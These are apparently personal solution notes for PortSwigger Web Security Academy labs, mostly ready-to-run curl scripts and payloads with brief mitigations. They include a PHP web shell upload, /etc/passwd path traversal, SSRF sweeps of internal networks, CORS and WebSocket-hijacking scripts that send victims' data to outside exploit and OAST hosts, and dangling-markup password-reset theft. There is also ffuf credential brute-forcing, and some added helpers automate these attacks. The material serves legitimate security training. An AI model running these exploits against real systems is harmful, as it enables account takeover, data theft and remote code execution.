# create initial (anonymous) session
curl -s -c cookies.jar $URL
# get CSRF token:
CSRF=$(curl -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)
# log in as wiener:
curl -L -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=wiener&password=peter"
curl -k -x $PROXY -b cookies.jar $URL/admin-roles -d "action=upgrade&username=wiener&confirmed=true"
EOF
Mitigation
Verify permissions at each stage of multi-step process.
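The access-control labs above (role taken from a cookie or a roleid field, X-Original-URL and Referer trusted, GET allowed where only POST is checked, an unprotected second step, id parameters and transcript ids readable by anyone, data leaked before a redirect) are what a single server-side authorization layer has to get right. The following is an added example, not the lab code, of such a dispatcher; the user store, endpoint names, fields and roles are assumptions modelled on the labs.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

ROLE_USER, ROLE_ADMIN = 1, 2
Response = Tuple[int, str]


@dataclass
class Account:
    username: str
    role: int
    email: str
    api_key: str


# Assumed server-side user store; the role lives here and nowhere else.
USERS: Dict[str, Account] = {
    "wiener": Account("wiener", ROLE_USER, "wiener@example", "KEY-WIENER"),
    "carlos": Account("carlos", ROLE_USER, "carlos@example", "KEY-CARLOS"),
    "administrator": Account("administrator", ROLE_ADMIN, "admin@example", "KEY-ADMIN"),
}


@dataclass
class Request:
    method: str
    path: str                            # the path actually requested
    params: Dict[str, str]               # query or form fields
    headers: Dict[str, str]
    session_user: Optional[str] = None   # resolved server-side from the session cookie


def current_user(req: Request) -> Optional[Account]:
    return USERS.get(req.session_user) if req.session_user else None


def is_admin(req: Request) -> bool:
    u = current_user(req)
    return u is not None and u.role == ROLE_ADMIN


def handle(req: Request) -> Response:
    """Dispatcher with the checks the labs above show missing. Authorization
    uses only req.path and the server-side session: X-Original-URL, Referer,
    the HTTP method, an Admin=true cookie and any roleid field are ignored."""
    user = current_user(req)

    if req.path.startswith("/admin"):
        if not is_admin(req):
            return (401, "") if user is None else (403, "")
        if req.path == "/admin/delete":
            if req.method != "POST":
                return 405, "state change requires POST"
            USERS.pop(req.params.get("username", ""), None)
            return 200, "deleted"
        if req.path == "/admin-roles":
            # both steps of the upgrade (with and without confirmed=true) pass the admin check above
            target = USERS.get(req.params.get("username", ""))
            if target is None:
                return 404, ""
            if req.params.get("confirmed") != "true":
                return 200, "confirm?"
            target.role = ROLE_ADMIN if req.params.get("action") == "upgrade" else ROLE_USER
            return 200, "role updated"
        return 200, "admin panel"

    if req.path == "/my-account":
        if user is None:
            return 302, ""               # redirect with an EMPTY body: nothing to leak
        target = req.params.get("id", user.username)
        if target != user.username and user.role != ROLE_ADMIN:
            return 403, ""
        return 200, f"API Key: {USERS[target].api_key}"   # the password is never rendered

    if req.path == "/my-account/change-email":
        if user is None:
            return 302, ""
        if req.method != "POST":
            return 405, ""
        user.email = req.params["email"]  # only the email is writable; roleid is not read
        return 200, "email updated"

    return 404, ""
```

Every decision above reads the principal from `session_user`, which the real application would set from its session store; nothing that arrives in the request (headers, cookies, form fields) can change who the caller is or what role they hold.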
Target
https://portswigger.net/web-security/access-control/lab-referer-based-access-control
Vulnerability
Access control for /admin-roles relies on the Referer header containing /admin; the header is attacker-controlled.
Exploitation
Exploit:
cat > labSolution-Referer-based-access-control.sh <<'EOF'
#!/bin/bash
URL=https://acf51f5f1f5a219bc085490e00580073.web-security-academy.net
PROXY=127.0.0.1:8081
# create initial (anonymous) session
curl -s -c cookies.jar $URL
# get CSRF token:
CSRF=$(curl -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)
# log in as wiener (-b sends the anonymous session the CSRF token was issued for, -c stores the authenticated one):
curl -L -k -x $PROXY -b cookies.jar -c cookies.jar -s $URL/login -d "csrf=$CSRF&username=wiener&password=peter"
curl -L -H "Referer: $URL/admin" -k -x $PROXY -b cookies.jar "$URL/admin-roles?username=wiener&action=upgrade"
EOF
Mitigation
Never use the Referer header for access control decisions; check the user's role from the session.
Target
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages
Vulnerability
Verbose error page (stack trace including the framework version banner) for a non-existent productId.
Exploitation
cat > labSolution-Information-disclosure-in-error-messages.sh <<'EOF'
#!/bin/bash
URL=https://ac0b1f111f42b8b5c06752a0005c006a.web-security-academy.net
PROXY=127.0.0.1:8081
# the error page for a non-existent product leaks the framework banner; the version is the 4th whitespace-separated field of that line
version=$(curl -s -k -x $PROXY "$URL/product?productId=notexistent" | grep -i apache | cut -d' ' -f4)
curl -k -x $PROXY $URL/submitSolution -d "answer=$version"
EOF
Mitigation
Return a generic error page to the client; keep stack traces and version banners in server-side logs only.
Target
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page
Discovery
curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net | grep -i debug
Analysis
Leakage of SECRET_KEY in the phpinfo.php page.
Exploitation
curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net/cgi-bin/phpinfo.php | grep SECRET_KEY
curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net/submitSolution -d 'answer=wx102tvamfn28xd0mf6bc0lfw0omqk4o'
Target
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files
Discovery
curl -s https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/robots.txt
Exploitation
wget https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/backup/ProductTemplate.java.bak && cat ProductTemplate.java.bak
curl -k -s https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/submitSolution -d 'answer=azgxgeekgrcvqe5lbheei6vqtppb9tuv'
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass
Solution:
TRACE /admin
# The TRACE response echoes our request back with an X-Custom-IP-Authorization header that the front-end added; supplying it ourselves bypasses the IP check:
GET /admin/delete?username=carlos
...
X-Custom-IP-Authorization: 127.0.0.1
Target
https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-basic-password-reset-poisoning
Vulnerability
The lab has a typical password reset scheme: the user supplies a username/email and a reset link is sent to the mailbox; whoever has access to that mailbox can set a new password.
The issue is that the reset link is generated dynamically on the backend from the Host header, which is supplied by the untrusted user.
Exploitation
- Learn the username or email address of the victim, e.g. by enumerating registered users. In the lab it is given: carlos.
- Request a password reset for the victim's username/email while manipulating the Host header:
POST /forgot-password HTTP/1.1
Host: [attacker.controlled.domain.net]
...
csrf=joLaw8RAzKsT6UqhT6X5D2MzlfRk6avZ&username=[victim-email-address]
- The backend now sends the victim a password reset email whose link points at the attacker's host:
https://attacker.controlled.domain.net/forgot-password?temp-forgot-password-token=[token]
- Wait for the victim to click the received password reset link.
- Monitor https://attacker.controlled.domain.net for requests carrying the victim's token.
- Set a new password for the victim with that token and take over the account:
POST /forgot-password?temp-forgot-password-token=[token] HTTP/1.1
Host: ac2e1f791f60b475c03512ca00550093.web-security-academy.net
...
csrf=joLaw8RAzKsT6UqhT6X5D2MzlfRk6avZ&temp-forgot-password-token=[token]&new-password-1=[newPassword]&new-password-2=[newPassword]
Mitigation
Do not use the user-supplied Host header when constructing the reset link; build it from a configured canonical hostname, and validate the Host header against an allowlist of hostnames the application serves.
Target
https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf
Discovery
for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl -s -o /dev/null -w "%{http_code}" -k -x 127.0.0.1:8080 -H "Host:192.168.0.$i" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/; done
Analysis
Exploitation
Get the CSRF token:
curl -s -L -k -x 127.0.0.1:8080 -H "Host:192.168.0.146" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/ | grep csrf | cut -d'"' -f6
Delete user:
curl -L -k -x 127.0.0.1:8080 -H "Host:192.168.0.146" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/admin/delete -d "username=carlos&csrf=3opFh3G3pX6WfecTEeIMMWS5rXVJHlja"
Mitigation
Validate the Host header against an allowlist before routing, and never forward a request to a backend derived from an unvalidated Host value.
Target
https://portswigger.net/web-security/host-header/exploiting/lab-host-header-ssrf-via-flawed-request-parsing
Discovery
curl --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -H "Host:d1f0j2osh1vbpmver478a51mwd23qs.burpcollaborator.net" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net/
Which sends following request (note the lack of leading slash in request line):
GET admin HTTP/1.1
Host: d1f0j2osh1vbpmver478a51mwd23qs.burpcollaborator.net
Cookie: _lab=<_LAB_COOKIE>
User-Agent: curl/7.77.0
Accept: */*
Connection: close
Analysis
Exploitation
Finding internal IP of machine with admin panel:
for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -s -o /dev/null -w "%{http_code}" -k -x 127.0.0.1:8080 -H "Host:192.168.0.$i" https://ac561f811e00c696c030a39300a100a6.web-security-academy.net; done
Getting CSRF
token:
curl -s --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -H "Host:192.168.0.99" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net/ | grep csrf | cut -d'"' -f6
Deleting user:
curl -s --request-target 'admin/delete' --cookie '_lab=<_LAB_COOKIE>' -H "Host:192.168.0.99" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net -d "username=carlos&csrf=BPr4IhyXjFpaBg94UtflJbU1l8XYJlTh"
Mitigation
Target
https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup
Vulnerability
The application has a password reset flow in which a new password is sent to the user's mailbox (which, as a side note, is a poor design: a single-use reset link is preferable). As in the previous labs, the email content is generated dynamically from the supplied Host header. However, this time its value cannot simply be swapped for another host.
We also know (from the lab hint) that the email content is processed by an antivirus solution of some kind that inspects (visits) links.
After some probing we observe that the Host header cannot be replaced with a different hostname, but an arbitrary string can be appended to it after a colon (in the position where a port number would go):
ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:[arbitrary-string]
The appended string is reflected, unescaped, in the password reset email:
<p>Hello!</p><p>Please <a href='https://ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:[arbitrary-string]
Exploitation
To exploit this behaviour we inject a dangling-markup img tag into the email content. Its src attribute is deliberately left unterminated, so everything in the email up to the next double quote, including the newly set password, becomes part of the URL that the link scanner requests from the attacker-controlled server:
Payload:
POST /forgot-password HTTP/1.1
Host: ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:<img src="https://exploit-ac621fec1f750cddc0b653190149007d.web-security-academy.net HTTP/1.1
...
csrf=Muy5ijvBGdZBDK7Wc1UhEesdOGnXYVCs&username=carlos
Revealed password (exploit server access log):
"GET /login'>click+here</a>+to+login+with+your+new+password:+N17bJQ1zbj</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1" 404
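The leaked request line above is URL-encoded (the scanner sent the email fragment as a path, so spaces became + and reserved characters became %XX). The following helper, added here and not part of the original notes, decodes such an access-log line and pulls out the password; the sample line is the one captured above, embedded as a constant.

```bash
#!/bin/bash
# Recover the password leaked by the dangling-markup password-reset poisoning attack
# from an exploit-server access-log line. Added example, not part of the original notes.

# Percent-decode a URL path component; '+' is decoded to a space (form-style encoding).
urldecode() {
  local s="$1"
  s="${s//+/ }"
  printf '%b' "${s//%/\\x}"
}

# Extract the request path from a common-log-format line: the part between "GET and HTTP/.
request_path() {
  local line="$1" q='"GET '
  line="${line#*"$q"}"
  printf '%s' "${line%% HTTP/*}"
}

# Decode the path and pull the password out of the email text, which reads
# 'new password: <value>' followed by the closing </p>. Returns 1 if no password is present.
extract_password() {
  local decoded re='new password: ([^<[:space:]]+)'
  decoded=$(urldecode "$(request_path "$1")")
  [[ $decoded =~ $re ]] || return 1
  printf '%s' "${BASH_REMATCH[1]}"
}

# Sample input: the access-log entry captured from the exploit server above.
SAMPLE_LOG="\"GET /login'>click+here</a>+to+login+with+your+new+password:+N17bJQ1zbj</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1\" 404"

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  extract_password "$SAMPLE_LOG" && echo
fi
```

Pipe the exploit server's access log through `extract_password` line by line when the scanner has visited more than one URL.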
Mitigation
Do not use the user-supplied Host header when constructing reset email content. Use a server-side configured canonical hostname, or validate the Host header against an allow-list of permitted values.
Target
https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass
Vulnerability
The admin panel is only meant to be reachable from localhost, but the check is based on the Host header. By spoofing Host: localhost we impersonate a local request and gain access to the admin panel.
Exploitation
Exploit:
cat > labSolution-Host-header-authentication-bypass.sh <<'EOF'
#!/bin/bash
# lab URL and local Burp proxy:
URL=https://ac351fd21e01d489c0ef40ee002700d4.web-security-academy.net
PROXY=127.0.0.1:8080
# get the value of the '_lab' cookie: write the cookie jar to stdout, discard the body
# (Netscape cookie-jar format is tab-separated; the value is the 7th field):
COOKIE=$(curl -s -k -c - -o /dev/null "$URL" | grep '_lab' | cut -f7)
# delete carlos; the URL is quoted so the shell does not treat '?' as a glob:
curl -s -H "Host: localhost" -b "_lab=$COOKIE" -k -x "$PROXY" "$URL/admin/delete?username=carlos"
EOF
Mitigation
Do not rely on the Host header as an authentication factor; it is fully attacker-controlled. Protect the admin panel with proper authentication and authorization and, in addition, enforce internal-only access at the network layer (at least IP-based access control).
Target
https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-poisoning-via-ambiguous-requests
Discovery
Analysis
Exploitation
Mitigation
Target
https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost
Exploitation
curl -s --cookie 'session=ad5aRkfuRv4ilMJfz3tVjYdDmA2103LA' -k -x 127.0.0.1:8080 -L https://ac651f3c1e02b956c01827ce004b0054.web-security-academy.net/product/stock -d "stockApi=http://localhost/admin/delete?username=carlos"
Mitigation
Target
https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system
Discovery
for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl -s -o /dev/null -w "%{http_code}" --cookie 'session=5N9l2T48cjM2v8hcBUt3nXR7rbIn0s4C' -k -x 127.0.0.1:8080 -L https://acf61f111effb787c06c89ab00fb00f1.web-security-academy.net/product/stock -d "stockApi=http://192.168.0.$i:8080/admin"; done
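The /24 sweeps above (the Host header scans and this stockApi scan) print a line for every one of the 254 addresses and leave the reader to spot the odd one out. The following helper, added here and not part of the original notes, reports only hosts whose response code differs from a baseline; the probe is pluggable, so one sweep serves both the Host header variant and the stockApi variant. LAB_URL, SESSION and the Burp proxy on 127.0.0.1:8080 are assumptions taken from the commands above.

```bash
#!/bin/bash
# Sweep 192.168.0.0/24 for the internal admin host, reporting only non-baseline responses.
# Added example, not part of the original notes.

# scan_internal_range PROBE BASELINE [FIRST] [LAST]
#   PROBE is the name of a function that takes the last octet and prints an HTTP status code.
#   Hosts answering with BASELINE (what the front end returns for a dead address) are skipped.
scan_internal_range() {
  local probe="$1" baseline="$2" first="${3:-1}" last="${4:-254}" i code
  for (( i = first; i <= last; i++ )); do
    code=$("$probe" "$i")
    [ "$code" = "$baseline" ] && continue
    printf '192.168.0.%d %s\n' "$i" "$code"
  done
}

# Probe for the Host header SSRF labs: the front end routes on the Host header.
# Assumes LAB_URL is exported and Burp listens on 127.0.0.1:8080.
probe_host_header() {
  curl -s -o /dev/null -w '%{http_code}' -k -x 127.0.0.1:8080 \
    -H "Host: 192.168.0.$1" "${LAB_URL:?set LAB_URL}/"
}

# Probe for the stockApi SSRF lab: the target is passed in the POST body instead.
# Assumes LAB_URL and SESSION (the session cookie value) are exported.
probe_stock_api() {
  curl -s -o /dev/null -w '%{http_code}' -k -x 127.0.0.1:8080 \
    --cookie "session=${SESSION:?set SESSION}" \
    "${LAB_URL:?set LAB_URL}/product/stock" -d "stockApi=http://192.168.0.$1:8080/admin"
}

# Usage (network required):
#   LAB_URL=https://LAB-ID.web-security-academy.net scan_internal_range probe_host_header 504
#   LAB_URL=... SESSION=... scan_internal_range probe_stock_api 500
```

Run the probe once against an address you know is dead to learn the baseline code before sweeping; different labs return different codes for unreachable hosts.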
Exploitation
curl -s --cookie 'session=5N9l2T48cjM2v8hcBUt3nXR7rbIn0s4C' -k -x 127.0.0.1:8080 -L https://acf61f111effb787c06c89ab00fb00f1.web-security-academy.net/product/stock -d "stockApi=http://192.168.0.242:8080/admin/delete?username=carlos"
Mitigation
https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter
Payload:
LoCaLhOSt/aDmIn/delete?username=carlos
https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection
Solution: abuse an open redirect in the application (the path parameter of /product/nextProduct). The stock checker accepts the local path and follows the redirect to the internal host:
stockApi=/product/nextProduct%3fcurrentProductId%3d19%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos
https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection
Solution: the application fetches the URL in the Referer header (analytics), so point it at a Burp Collaborator/OAST domain and watch for the out-of-band DNS or HTTP interaction.
Referer: https://cfvmob36g2wyztoyn5de47ajxa31rrfg.oastify.com
https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter
https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation
https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack
Solution:
Prepare malicious site at https://exploit-aca61f101e0cd2bbc0651ef401560071.web-security-academy.net/exploit
with following content:
<body>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac261f591e78d235c08f1e24008500d0.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//exploit-aca61f101e0cd2bbc0651ef401560071.web-security-academy.net/RESPONSE='+this.responseText;
}
</script>
</body>
Entice a victim to visit the site.
https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack
Solution:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac6b1fca1ed6a388c0134d600014004e.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-aca01f401ecfa3bec0144d20010e005b.web-security-academy.net/RESPONSE='+this.responseText;
};
</script>"></iframe>
Entice a victim to visit the site.
https://portswigger.net/web-security/os-command-injection/lab-simple
Solution:
curl -s https://ac6d1f651f877b62c0b55c6900bf0003.web-security-academy.net/product/stock -d 'productId=4;&storeId=whoami'
https://portswigger.net/web-security/file-path-traversal/lab-simple
Solution:
curl -s https://ac6e1f941f6b5fc4c0268759008a0086.web-security-academy.net/image?filename=../../../etc/passwd
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
Solution:
curl -s https://acca1fb61f2f6549c01b7fe40084009d.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects
Solution:
curl -L -k -x 127.0.0.1:8080 --cookie session="$(rawurlencode "$(echo -n 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:5:"admin";b:1;}' |base64 -w 0)")" -s https://acb81f701e4368eac086a2d100ff0039.web-security-academy.net/admin/delete?username=carlos
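The command above depends on a `rawurlencode` shell function that is not shown anywhere in these notes. The following builder, added here and not part of the original notes, produces the same cookie value from a username and admin flag: it serializes the PHP User object with correct string lengths (PHP rejects a length that does not match the string), base64-encodes it and percent-encodes the result so that the +, / and = characters survive in the Cookie header. The lab URL in the usage comment is a placeholder.

```bash
#!/bin/bash
# Build the PHP-serialized User object for the deserialization lab and encode it as the
# application expects its session cookie: base64, then URL-encoded.
# Added example, not part of the original notes.

# Serialize a PHP object of class User with two properties: username (string) and admin (bool).
# PHP's format prefixes every string with its byte length, which must be kept consistent.
php_serialize_user() {
  local username="$1" admin="$2"   # admin: 1 or 0
  local len
  len=$(( $(printf '%s' "$username" | wc -c) ))   # byte length, not character count
  printf 'O:4:"User":2:{s:8:"username";s:%d:"%s";s:5:"admin";b:%d;}' "$len" "$username" "$admin"
}

# Percent-encode every character outside the RFC 3986 unreserved set.
urlencode() {
  local s="$1" out="" c i
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      [A-Za-z0-9._~-]) out+="$c" ;;
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# Full cookie value: serialize -> base64 (single line) -> URL-encode.
build_session_cookie() {
  urlencode "$(php_serialize_user "$1" "$2" | base64 | tr -d '\n')"
}

# Usage (network required; LAB-ID is a placeholder for the lab hostname):
#   curl -s -k -x 127.0.0.1:8080 --cookie "session=$(build_session_cookie administrator 1)" \
#     'https://LAB-ID.web-security-academy.net/admin/delete?username=carlos'
```

Decode the application's own cookie first (`base64 -d` after URL-decoding) and compare it with `php_serialize_user wiener 0`; if the property names or order differ from the lab instance you are working on, adjust the format string rather than the encoding steps.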
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
Solution:
# file upload:
curl --cookie 'session=dyqaoIriO5ZVrUFaVPkJzQUzO4owEwQG' -s https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='<?php system(\"cat /home/carlos/secret\") ?>';filename=s.php" -F "csrf=WjAuaitTZfPMr38U0DT3VY3cGA0ActDq" -F "user=wiener"
# file execution:
curl https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/files/avatars/s.php
https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass
Solution (as previously, but explicitly spoofing the Content-Type of the uploaded part):
curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account |grep csrf
curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='<?php system(\"cat /home/carlos/secret\") ?>';filename=s.php;type=image/png" -F "csrf=bwZwpzDsnnWqkQwAj3vqLuvTEDN06VDx" -F "user=wiener"
curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/files/avatars/s.php
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls
Solution steps:
- Log in
- Intercept the 'Add to cart' request and change its price parameter
- Buy the product for the chosen price
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level
Solution:
- Log in
- Observe that the quantity parameter of the POST /cart request accepts negative numbers, so the total price can be driven down (even below zero)
- Taking advantage of this, add -60 of the 2nd product to the cart, then add the first (target) product
- The total will be computed as: price of the first product + (-60 * price of the 2nd product), which is less than your store credit
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-security-controls
Solution steps:
- Register as an administrator user, providing your attacker-controlled email
- Activate the account using the received activation link
- Log in
- Change your email to '[email protected]'
- Access the admin panel and delete the 'carlos' user
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules
Solution:
- Sign up for the newsletter with POST /sign-up; a new promo code is received
- Apply the promo codes alternately until the product becomes affordable
https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities
Payload: <img src=1 onerror='alert(1)'/>
Solution (3rd party tool used: https://github.com/vi/websocat):
echo -n "{\"message\":\"<img src=1 onerror='alert(1)'/>\"}" | websocat --text -v - wss://acc21f591f207752c010be23002b006e.web-security-academy.net/chat
This is cross-site WebSocket hijacking, essentially CSRF over a WebSocket connection: the victim is tricked into visiting a malicious website, which performs the WebSocket handshake on behalf of the victim (the browser attaches the session cookie) and then reads the victim's data (chat history).
Solution:
<script>
var ws = new WebSocket('wss://0a980078030a90998cafb73000ca00c4.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://m2pxjb5rp8flu7rxbrz3226he8kz8pwe.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
Mitigation:
As with standard CSRF, anti-CSRF tokens must be used in the WebSocket handshake so that an attacker cannot forge the handshake on behalf of the victim; checking the Origin header on the handshake request is a further defence.
https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities
https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
Solution:
# enumerate usernames: unknown users get an 'Invalid username' response, so filter those out
ffuf -t 10 -x http://127.0.0.1:8080 -X POST -b 'session=S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w users.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=FUZZ&password=xyz" -fr 'Invalid'
# brute-force the password of the discovered user: wrong passwords get 'Incorrect password'
ffuf -t 10 -x http://127.0.0.1:8080 -X POST -b 'session=S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w passwd.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=applications&password=FUZZ" -fr 'Incorrect'
# log in with the found credentials (the session cookie is sent with -b, not as a raw header)
curl -L -b 'session=S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' 'https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login' -d "username=applications&password=pepper"
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass
Solution:
1. Provide carlos credentials
2. Modify redirect: instead of `/login2` go directly to `/my-account`
https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic
Solution:
# request reset password link for wiener:
curl https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password -d "username=wiener"
# set a new password for carlos: the reset token is not bound to the username submitted with it
curl -L -k -x 127.0.0.1:8080 --cookie 'session=jhDhbpkpWYLfS9HVTLGS6pDBh6PydHYo' 'https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password?temp-forgot-password-token=W7J5AbLFD67g5Zrie4vKE9DiyVLUhrnH' -d 'temp-forgot-password-token=6KksLbqie6NBvAVcyCPmJr9Qrxskgxzr&username=carlos&new-password-1=abc&new-password-2=abc'
https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected
Solution:
<style>
iframe {
position:relative;
width:500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:495px;
left:70px;
z-index: 1;
}
</style>
<div>click me</div>
<iframe src="https://0a3a00b004f0a545823629f2002c003e.web-security-academy.net/my-account"></iframe>
https://portswigger.net/web-security/clickjacking/lab-prefilled-form-input
Solution:
<style>
iframe {
position:relative;
width:500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:450px;
left:70px;
z-index: 1;
}
</style>
<div>click me</div>
<iframe src="https://0a0a007a0426b22481bb0cc7009d00b3.web-security-academy.net/[email protected]"></iframe>
https://portswigger.net/web-security/clickjacking/lab-frame-buster-script
Solution:
<style>
iframe {
position:relative;
width:500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:530px;
left:75px;
z-index: 1;
}
</style>
<div>click me</div>
<iframe src="https://0ac600f403d0b36d80cc49c800fd00de.web-security-academy.net/[email protected]" sandbox="allow-forms"></iframe>
https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss
Solution:
<style>
iframe {
position:relative;
width:500px;
height: 1000px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:790px;
left:70px;
z-index: 1;
}
</style>
<div>click me</div>
<iframe src="https://0a7400270324b4218066b7f500d20071.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=%27print()%27/%3E&[email protected]&subject=abc&message=xyz"></iframe>
https://portswigger.net/web-security/clickjacking/lab-multistep
Solution:
<style>
.frame1 {
position:relative;
width:500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
.click1 {
position:absolute;
top:495px;
left:70px;
z-index: 1;
}
.click2 {
position:absolute;
top:300px;
left:200px;
z-index: 1;
}
</style>
<div class="click1">Click me first</div>
<div class="click2">Click me next</div>
<iframe class="frame1" src="https://0a15001c0368c65d8033e933004e0061.web-security-academy.net/my-account"></iframe>
Target
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature
Discovery
Modify the sub claim in the JWT payload. Request GET /my-account. Observe that the displayed username has changed, i.e. the signature is never checked.
Exploitation
Modify the sub claim in the JWT payload to administrator. Request GET /admin/delete?username=carlos.
Mitigation
Verify the JWT signature on the backend and reject all requests carrying a token with an invalid signature.
Target
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
Discovery
Set the alg field in the JWT header to none and remove the signature (keep the trailing dot so the token still has three parts). Request GET /my-account. Observe that the request is accepted.
Exploitation
Modify the sub claim in the JWT payload to administrator. Set alg in the header to none and drop the signature. Request GET /admin/delete?username=carlos.
Mitigation
Never trust the alg declared in the token: reject alg none (and any algorithm outside an explicit allow-list) and always verify the signature with the expected server-side key.
Payload:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
Raw request:
POST /product/stock HTTP/1.1
[...]
Connection: close
